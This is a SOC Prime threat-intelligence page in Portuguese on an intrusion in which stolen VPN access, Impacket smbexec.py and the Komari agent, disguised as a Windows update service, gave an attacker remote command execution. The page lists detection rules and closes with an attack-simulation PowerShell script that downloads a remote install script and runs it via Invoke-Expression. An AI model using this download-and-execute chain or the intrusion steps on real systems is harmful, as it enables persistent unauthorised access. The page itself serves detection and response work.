SOC Prime Bias: Crítico

30 Apr 2026 14:19 UTC

Komari: A Ferramenta de “Monitoramento” Que Não Precisava Ser Armada

Author Photo
SOC Prime Team linkedin icon Seguir
Komari: A Ferramenta de “Monitoramento” Que Não Precisava Ser Armada
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumo

Um ator de ameaça usou credenciais de VPN roubadas para acessar uma estação de trabalho Windows de um parceiro da Huntress, então habilitou RDP e implantou o agente de monitoramento de código aberto Komari como um serviço de nível SYSTEM disfarçado como Serviço de Atualização do Windows através do NSSM. Uma vez instalado, o agente estabeleceu uma conexão WebSocket persistente com uma infraestrutura controlada pelo invasor e forneceu capacidades como execução de comandos, acesso ao terminal e ping estilo batimento cardíaco. Na prática, a ferramenta funcionou como uma estrutura leve de comando e controle sem exigir armamento adicional.

Investigação

A intrusão começou com um login de VPN SSL originado de 45.153.34.132, seguido pelo uso do smbexec.py do Impacket para habilitar RDP e executar uma série de comandos remotos. Os investigadores descobriram que um comando PowerShell baixava o instalador do Komari diretamente do GitHub e o registrava como um serviço do Windows. Esse serviço então lançava komari-agent.exe, abria uma sessão WebSocket para o servidor do atacante e permitia a execução remota arbitrária de comandos no host.

Mitigação

A Huntress respondeu isolando a estação de trabalho comprometida, desativando a conta de usuário afetada e parando o serviço Komari criado pelo NSSM. A conexão WebSocket maliciosa foi bloqueada, e o mecanismo de persistência foi removido do sistema. As defesas recomendadas incluem apertar os controles de acesso VPN, monitorar a criação de serviços suspeitos, inspecionar a atividade de saída do WebSocket e reforçar a segurança do RDP.

Resposta

Os defensores devem detectar a criação de um serviço do Windows chamado Serviço de Atualização do Windows que aponta para komari-agent.exe, monitorar conexões WebSocket de longa duração para hosts desconhecidos e alertar sobre o uso de ferramentas Impacket como smbexec.py para movimento lateral. Se identificados, o endpoint afetado deve ser contido imediatamente, credenciais comprometidas revogadas, e o serviço invasor removido do ambiente.

Fluxo de Ataque

Detecções

Padrões de Linha de Comando do Impacket Possíveis (via cmdline)

Equipe SOC Prime
30 Abr 2026

Possível Execução Remota de Código usando Impacket (via cmdline)

Equipe SOC Prime
30 Abr 2026

Execução de Arquivo PowerShell em Diretório Suspeito Usando Política de Execução Bypass (via cmdline)

Equipe SOC Prime
30 Abr 2026

Download ou Upload via PowerShell (via cmdline)

Equipe SOC Prime
30 Abr 2026

Possíveis Servidores de Área de Trabalho Remota Sombreamento (via criação de processo)

Equipe SOC Prime
30 Abr 2026

Modificações Suspeitas de Firewall via CLI (via cmdline)

Equipe SOC Prime
30 Abr 2026

Processo Suspeito Utiliza um URL na Linha de Comando (via cmdline)

Equipe SOC Prime
30 Abr 2026

Software Alternativo de Acesso / Gerenciamento Remoto (via criação de processo)

Equipe SOC Prime
30 Abr 2026

IOCs (HashSha256) para detectar: Komari: A ferramenta de ‘Monitoramento’ que não precisou de armamento

Regras da AI da SOC Prime
30 Abr 2026

IOCs (SourceIP) para detectar: Komari: A ferramenta de ‘Monitoramento’ que não precisou de armamento

Regras da AI da SOC Prime
30 Abr 2026

IOCs (DestinationIP) para detectar: Komari: A ferramenta de ‘Monitoramento’ que não precisou de armamento

Regras da AI da SOC Prime
30 Abr 2026

Detecção da Execução de Impacket smbexec.py e cmd.exe via RDP [Criação de Processo Windows]

Regras da AI da SOC Prime
30 Abr 2026

Execução PowerShell para Instalação do Agente Komari [PowerShell Windows]

Regras da AI da SOC Prime
30 Abr 2026

Detectar Persistência do Agente Komari via Serviço de Atualização do Windows [Sistema Windows]

Regras da AI da SOC Prime
30 Abr 2026

Detecção de Acesso SSLVPN Não Autorizado e Atividade Pós-Comprometimento [Firewall]

Regras da AI da SOC Prime
30 Abr 2026

Execução da Simulação

Pré-requisito: O Check de Pré-Voo de Telemetria & Baseline deve ter passado.

  • Narrativa do Ataque & Comandos:
    Um adversário obteve uma posição em um host Windows e deseja instalar o agente Komari C2 para manter a persistência e posteriormente fazer dump de credenciais (T1003.001). Para evitar a detecção pelas defesas de bloqueio de scripts tradicionais, o invasor executa PowerShell com -ExecutionPolicy Bypass e baixa diretamente o instalador do repositório público do GitHub. A linha de comando corresponde exatamente à regra de detecção, gerando a telemetria esperada.

  • Script de Teste de Regressão:

    # Simulação de Instalação do Agente Komari
    $url = "https://raw.githubusercontent.com/komari-monitor/komari-agent/main/install.ps1"
    $script = (New-Object System.Net.WebClient).DownloadString($url)
    Invoke-Expression $script
  • Comandos de Limpeza:

    # Remova quaisquer arquivos criados pelo instalador simulado (se houver)
    Remove-Item -Path "$Env:ProgramFilesKomari" -Recurse -Force -ErrorAction SilentlyContinue
    # Pare qualquer processo Komari que possa ter sido iniciado
    Get-Process -Name "Komari" -ErrorAction SilentlyContinue | Stop-Process -Force